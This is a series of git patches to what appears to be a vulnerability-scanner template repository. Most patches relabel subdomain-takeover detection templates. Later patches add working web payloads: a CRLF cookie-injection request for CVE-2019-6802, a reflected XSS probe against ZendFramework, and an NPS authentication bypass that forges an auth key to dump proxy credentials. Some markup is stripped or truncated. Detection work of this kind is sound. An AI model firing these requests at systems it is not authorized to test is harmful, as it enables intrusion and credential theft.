https://nvd.nist.gov/vuln/detail/CVE-2019-3912 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-3912 cwe-id: CWE-601 From 33c8c0e78239e4423637776bae7f7620448b86d8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:35:37 -0500 Subject: [PATCH 0958/1415] Update and rename campaignmonitor.yaml to campaignmonitor-takeover.yaml 1. Following filename formatting & id template = filename 2. Added link to github issue --- .../{campaignmonitor.yaml => campaignmonitor-takeover.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename takeovers/{campaignmonitor.yaml => campaignmonitor-takeover.yaml} (83%) diff --git a/takeovers/campaignmonitor.yaml b/takeovers/campaignmonitor-takeover.yaml similarity index 83% rename from takeovers/campaignmonitor.yaml rename to takeovers/campaignmonitor-takeover.yaml index 5582631239..fd45755863 100644 --- a/takeovers/campaignmonitor.yaml +++ b/takeovers/campaignmonitor-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - 'Trying to access your account?' - 'or Date: Mon, 5 Dec 2022 23:39:58 -0500 Subject: [PATCH 0960/1415] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index d2a82d8034..6c9e91b93e 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and \ No newline at end of file + condition: and From b133a47fcf49e3812dd18ccc8e4a8c1d555b44d5 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:44:56 -0500 Subject: [PATCH 0961/1415] Update getresponse-takeover.yaml --- takeovers/getresponse-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/getresponse-takeover.yaml b/takeovers/getresponse-takeover.yaml index 005c64d379..01134f39b3 100644 --- a/takeovers/getresponse-takeover.yaml +++ b/takeovers/getresponse-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - 'With GetResponse Landing Pages, lead generation has never been easier' \ No newline at end of file + - 'With GetResponse Landing Pages, lead generation has never been easier' From cb3004421a3bc497cb5d9c3cf3937f4d68249d5b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:18:53 +0530 Subject: [PATCH 0964/1415] Update campaignmonitor-takeover.yaml --- takeovers/campaignmonitor-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/campaignmonitor-takeover.yaml b/takeovers/campaignmonitor-takeover.yaml index fd45755863..5bfccd70dc 100644 --- a/takeovers/campaignmonitor-takeover.yaml +++ b/takeovers/campaignmonitor-takeover.yaml @@ -1,12 +1,12 @@ id: campaignmonitor-takeover info: - name: campaignmonitor takeover detection + name: CampaignMonitor Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275 - tags: takeover + tags: takeover,campaignmonitor requests: - method: GET From 6cbc40cd20419af2bdb02b5cc69d70d886854fe6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:19:10 +0530 Subject: [PATCH 0965/1415] Revert "Update cargocollective-takeover.yaml" --- takeovers/cargocollective-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index 6c9e91b93e..d2a82d8034 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover requests: @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and + condition: and \ No newline at end of file From 0064c2c565d1f2fa67c1457e3eb2c8ad44f9dd50 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:49:15 -0500 Subject: [PATCH 0966/1415] Update helprace-takeover.yaml --- takeovers/helprace-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/helprace-takeover.yaml b/takeovers/helprace-takeover.yaml index e7ea585d66..a122264163 100644 --- a/takeovers/helprace-takeover.yaml +++ b/takeovers/helprace-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 tags: takeover requests: From 01356a140fd242d1b74c6dad430148bdeb03f9a0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:19:53 +0530 Subject: [PATCH 0967/1415] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index d2a82d8034..51cf5894f8 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -1,12 +1,12 @@ id: cargocollective-takeover info: - name: cargocollective takeover detection + name: CargoCollective Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + tags: takeover,cargocollective requests: - method: GET @@ -23,4 +23,4 @@ requests: words: - '
' - '404 Not Found
' - condition: and \ No newline at end of file + condition: and From 1a0f85c8b41c153c4c5136e21bf285009be66bbb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:21:10 +0530 Subject: [PATCH 0968/1415] Update cargocollective-takeover.yaml --- takeovers/cargocollective-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index 51cf5894f8..4a16ccee73 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152 tags: takeover,cargocollective requests: From 73955315bb6795e0ba9bd94b63e3e9b0657d728a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:23:56 +0530 Subject: [PATCH 0971/1415] Update getresponse-takeover.yaml --- takeovers/getresponse-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/getresponse-takeover.yaml b/takeovers/getresponse-takeover.yaml index 01134f39b3..cc6d0adf85 100644 --- a/takeovers/getresponse-takeover.yaml +++ b/takeovers/getresponse-takeover.yaml @@ -1,12 +1,12 @@ id: getresponse-takeover info: - name: getresponse takeover detection + name: Getresponse Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/235 - tags: takeover + tags: takeover,getresponse requests: - method: GET From d6d1f935ee5b21308033c2a4f23ac0310e2207b3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Mon, 5 Dec 2022 23:54:38 -0500 Subject: [PATCH 0972/1415] Update uberflip-takeover.yaml --- takeovers/uberflip-takeover.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index d058830fbb..49f9775916 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -5,8 +5,9 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 + - https://hackerone.com/reports/863551 + tags: takeover,hackerone requests: - method: GET @@ -21,4 +22,4 @@ requests: - type: word words: - - "Non-hub domain, The URL you've accessed does not provide a hub." \ No newline at end of file + - "Non-hub domain, The URL you've accessed does not provide a hub." From 5d5eade13eb8fe281114debd33c8473aad24a36e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:25:32 +0530 Subject: [PATCH 0973/1415] Update helprace-takeover.yaml --- takeovers/helprace-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/helprace-takeover.yaml b/takeovers/helprace-takeover.yaml index a122264163..5da4aca364 100644 --- a/takeovers/helprace-takeover.yaml +++ b/takeovers/helprace-takeover.yaml @@ -1,12 +1,12 @@ id: helprace-takeover info: - name: helprace takeover detection + name: Helprace Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/115 - tags: takeover + tags: takeover,helprace requests: - method: GET From 5c103c0085c6e686aa0db5683e68c63802b0b941 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:27:49 +0530 Subject: [PATCH 0976/1415] Update uberflip-takeover.yaml --- takeovers/uberflip-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index 49f9775916..4db92ed09d 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -1,13 +1,13 @@ id: uberflip-takeover info: - name: uberflip takeover detection + name: Uberflip Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 - https://hackerone.com/reports/863551 - tags: takeover,hackerone + tags: takeover,uberflip requests: - method: GET From 4c8eaf67a825b99337f3e7669f4cafe6606ef0a8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:04:15 -0500 Subject: [PATCH 0979/1415] Update pingdom-takeover.yaml --- takeovers/pingdom-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/pingdom-takeover.yaml b/takeovers/pingdom-takeover.yaml index 550baa3b6f..ed296f33fc 100644 --- a/takeovers/pingdom-takeover.yaml +++ b/takeovers/pingdom-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word words: - Public Report Not Activated - - This public report page has not been activated by the user \ No newline at end of file + - This public report page has not been activated by the user From 396ded6fab5f86d6684f963352993e2e917fc43a Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:10:04 -0500 Subject: [PATCH 0980/1415] Update readme-takeover.yaml --- takeovers/readme-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 4a0a6191b5..56dc030d30 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41 tags: takeover requests: From bf3e84d419e885e061df3303d7e5828b7db5edde Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:12:53 -0500 Subject: [PATCH 0981/1415] Update airee-takeover.yaml --- takeovers/airee-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/airee-takeover.yaml b/takeovers/airee-takeover.yaml index 42a3ee803e..b0593108e9 100644 --- a/takeovers/airee-takeover.yaml +++ b/takeovers/airee-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word name: airee words: - - 'Ошибка 402. Сервис Айри.рф не оплачен' \ No newline at end of file + - 'Ошибка 402. Сервис Айри.рф не оплачен' From 532a29f643ebbd49526aa2cb2083f55c4a4b0a3b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:43:10 +0530 Subject: [PATCH 0982/1415] Update pingdom-takeover.yaml --- takeovers/pingdom-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/pingdom-takeover.yaml b/takeovers/pingdom-takeover.yaml index ed296f33fc..ececc6187c 100644 --- a/takeovers/pingdom-takeover.yaml +++ b/takeovers/pingdom-takeover.yaml @@ -1,12 +1,12 @@ id: pingdom-takeover info: - name: pingdom takeover detection + name: Pingdom Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/144 - tags: takeover + tags: takeover,pingdom requests: - method: GET From 825988929c89e091fc33906b862d9f16a29506b9 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:13:43 -0500 Subject: [PATCH 0983/1415] Update heroku-takeover.yaml --- takeovers/heroku-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 318a0da558..e7ea5e3ac2 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -5,7 +5,7 @@ info: author: 0xPrial,pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/38 tags: takeover,heroku requests: From ebcd6d71a7d09fcd44682b840b20f06506ba4116 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:44:21 +0530 Subject: [PATCH 0984/1415] Update readme-takeover.yaml --- takeovers/readme-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readme-takeover.yaml b/takeovers/readme-takeover.yaml index 56dc030d30..32d04c7524 100644 --- a/takeovers/readme-takeover.yaml +++ b/takeovers/readme-takeover.yaml @@ -1,12 +1,12 @@ id: readme-takeover info: - name: readme takeover detection + name: Readme Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/41 - tags: takeover + tags: takeover,readme requests: - method: GET From a4cb5039d283d801192b20e3e0b4db22c8a80bf0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Dec 2022 05:14:49 +0000 Subject: [PATCH 0985/1415] Auto Generated CVE annotations [Tue Dec 6 05:14:49 UTC 2022] :robot: --- takeovers/uberflip-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/uberflip-takeover.yaml b/takeovers/uberflip-takeover.yaml index 4db92ed09d..00d35b9299 100644 --- a/takeovers/uberflip-takeover.yaml +++ b/takeovers/uberflip-takeover.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/150 - https://hackerone.com/reports/863551 - tags: takeover,uberflip + tags: takeover,uberflip,hackerone requests: - method: GET From 4648205445f35f614ba1914835bb61e6e434b117 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:45:26 +0530 Subject: [PATCH 0986/1415] Update airee-takeover.yaml --- takeovers/airee-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/airee-takeover.yaml b/takeovers/airee-takeover.yaml index b0593108e9..cc02d0c311 100644 --- a/takeovers/airee-takeover.yaml +++ b/takeovers/airee-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104 - tags: takeover + tags: takeover,airee requests: - method: GET From e271c5267ee8ecec136bf4fb8e5155e47dcd8859 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:45:56 +0530 Subject: [PATCH 0987/1415] Update heroku-takeover.yaml --- takeovers/heroku-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index e7ea5e3ac2..9b0c5a41dc 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -1,7 +1,7 @@ id: heroku-takeover info: - name: heroku takeover detection + name: Heroku Takeover Detection author: 0xPrial,pdteam severity: high reference: From d98fd1f1e8a23824d3a22484d62ed013b74158cd Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:16:32 -0500 Subject: [PATCH 0989/1415] Update jetbrains-takeover.yaml --- takeovers/jetbrains-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/jetbrains-takeover.yaml b/takeovers/jetbrains-takeover.yaml index 5bca3b0b3d..dace23fc52 100644 --- a/takeovers/jetbrains-takeover.yaml +++ b/takeovers/jetbrains-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/pull/107 tags: takeover,jetbrains requests: From 9ea8d2c9c84840ce2febca6ca998abd10e3a10ce Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 10:49:17 +0530 Subject: [PATCH 0993/1415] Update jetbrains-takeover.yaml --- takeovers/jetbrains-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/jetbrains-takeover.yaml b/takeovers/jetbrains-takeover.yaml index dace23fc52..c0aef11af2 100644 --- a/takeovers/jetbrains-takeover.yaml +++ b/takeovers/jetbrains-takeover.yaml @@ -1,7 +1,7 @@ id: jetbrains-takeover info: - name: jetbrains takeover detection + name: Jetbrains Takeover Detection author: pdteam severity: high reference: From 0594ac5871e08db8475e665979e3968a5a5a5412 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:37:44 -0500 Subject: [PATCH 0994/1415] Update readthedocs-takeover.yaml --- takeovers/readthedocs-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readthedocs-takeover.yaml b/takeovers/readthedocs-takeover.yaml index 667abcee45..66ea3d39fa 100644 --- a/takeovers/readthedocs-takeover.yaml +++ b/takeovers/readthedocs-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160 tags: takeover requests: @@ -21,4 +21,4 @@ requests: - type: word words: - - unknown to Read the Docs \ No newline at end of file + - unknown to Read the Docs From a473bbb48e81cdb4ac5fb7f06913da966ad820a8 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:38:41 -0500 Subject: [PATCH 0995/1415] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index c01e997b90..ea36cdaddb 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -5,7 +5,7 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 tags: takeover requests: @@ -22,4 +22,4 @@ requests: - type: word words: - ngrok.io not found - - Tunnel *.ngrok.io not found \ No newline at end of file + - Tunnel *.ngrok.io not found From 85c2c545077e34282224f5f983edad28b9efca0d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Dec 2022 11:20:42 +0530 Subject: [PATCH 0997/1415] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index ea36cdaddb..8c10f47d82 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -1,7 +1,7 @@ id: ngrok-takeover info: - name: ngrok takeover detection + name: Ngrok Takeover Detection author: pdteam severity: high reference: From 6a63741ac7972e2de0bd1f02df7d7d9e5e4e0794 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 6 Dec 2022 00:50:45 -0500 Subject: [PATCH 0998/1415] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index f573aaffd5..19f9b5314e 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high description: agilecrm subdomain takeover was detected. reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 tags: takeover requests: From 8df2af78cf18fc35cd3fa12e0491a476bc53c890 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:21:13 +0530 Subject: [PATCH 0999/1415] Update ngrok-takeover.yaml --- takeovers/ngrok-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/ngrok-takeover.yaml b/takeovers/ngrok-takeover.yaml index 8c10f47d82..3614f08b80 100644 --- a/takeovers/ngrok-takeover.yaml +++ b/takeovers/ngrok-takeover.yaml @@ -6,7 +6,7 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/92 - tags: takeover + tags: takeover,ngrok requests: - method: GET From 5cae4d7393508f6efe3ce904ea951d82448c95b4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:24:01 +0530 Subject: [PATCH 1001/1415] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index 19f9b5314e..569c0a2e32 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -1,13 +1,13 @@ id: agilecrm-takeover info: - name: agilecrm - Subdomain Takeover Detection + name: Agilecrm Takeover Detection author: pdteam severity: high description: agilecrm subdomain takeover was detected. reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/145 - tags: takeover + tags: takeover,agilecrm requests: - method: GET From 881873448ad0238a27a20c95a11a591cbed57a59 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:24:39 +0530 Subject: [PATCH 1002/1415] Update agilecrm-takeover.yaml --- takeovers/agilecrm-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index 569c0a2e32..60bc6eb785 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -1,7 +1,7 @@ id: agilecrm-takeover info: - name: Agilecrm Takeover Detection + name: AgileCRM Takeover Detection author: pdteam severity: high description: agilecrm subdomain takeover was detected. From 7e9631f04fb469e82c5b7ed0e01a23cbcf2ad170 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 6 Dec 2022 11:25:24 +0530 Subject: [PATCH 1003/1415] Update readthedocs-takeover.yaml --- takeovers/readthedocs-takeover.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/takeovers/readthedocs-takeover.yaml b/takeovers/readthedocs-takeover.yaml index 66ea3d39fa..a45cbee7da 100644 --- a/takeovers/readthedocs-takeover.yaml +++ b/takeovers/readthedocs-takeover.yaml @@ -1,12 +1,12 @@ id: readthedocs-takeover info: - name: readthedocs takeover detection + name: Read the Docs Takeover Detection author: pdteam severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/160 - tags: takeover + tags: takeover,readthedocs requests: - method: GET From b2668c30ebac4a5b253a5e303a6e08e0bbd9a00e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 6 Dec 2022 11:55:31 +0530 Subject: [PATCH 1007/1415] Update CVE-2019-6802.yaml --- CVE-2019-6802.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/CVE-2019-6802.yaml b/CVE-2019-6802.yaml index a9848720e7..15c993a74b 100644 --- a/CVE-2019-6802.yaml +++ b/CVE-2019-6802.yaml @@ -9,18 +9,16 @@ info: - https://vuldb.com/?id.130257 - https://www.cvedetails.com/cve/CVE-2019-6802/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2019-6802 - cwe-id: CWE-93 tags: cve,cve2019,crlf,generic,pypiserver requests: - method: GET path: - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" + matchers: - - type: regex + - type: word part: header - regex: - - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + words: + - 'Set-Cookie: crlfinjection=1;' From 84a48a61ad8c213f2f5afc7f8243847dca037bad Mon Sep 17 00:00:00 2001 From: Celesian Date: Tue, 6 Dec 2022 05:13:46 -0300 Subject: [PATCH 1008/1415] added XSS for ZendFramework1 --- vulnerabilities/zend/zend-v1-xss.yaml | 39 +++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/zend/zend-v1-xss.yaml diff --git a/vulnerabilities/zend/zend-v1-xss.yaml b/vulnerabilities/zend/zend-v1-xss.yaml new file mode 100644 index 0000000000..788745b62a --- /dev/null +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -0,0 +1,39 @@ +id: zend-v1-xss + +info: + name: ZendFramework 1.12.2 - Cross-Site Scripting + author: c3l3si4n + severity: medium + description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. + reference: + - https://twitter.com/c3l3si4n/status/1600035722148212737 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + tags: zend,zendframework,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=%20a='{{randstr}}'>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{randstr}}' + - ' Date: Tue, 6 Dec 2022 16:52:23 +0800 Subject: [PATCH 1009/1415] Added nps-auth-bypass --- vulnerabilities/nps/nps-auth-bypass.yaml | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/nps/nps-auth-bypass.yaml diff --git a/vulnerabilities/nps/nps-auth-bypass.yaml b/vulnerabilities/nps/nps-auth-bypass.yaml new file mode 100644 index 0000000000..82ce8d4b82 --- /dev/null +++ b/vulnerabilities/nps/nps-auth-bypass.yaml @@ -0,0 +1,35 @@ +id: nps-auth-bypass + +info: + name: NPS Authentication Bypass + author: SleepingBag945 + severity: high + description: This will reveal all parameters configured on the NPS, including the account username and password of the proxy. + reference: + - https://mari0er.club/post/nps.html/ + tags: nps,auth-bypass + +requests: + - raw: + - | + POST /index/gettunnel HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + auth_key={{md5(unix_time())}}×tamp={{unix_time()}}&offset=0&limit=10&type=socks5&client_id=&search= + + matchers-condition: and + matchers: + - type: word + words: + - "rows" + - "total" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 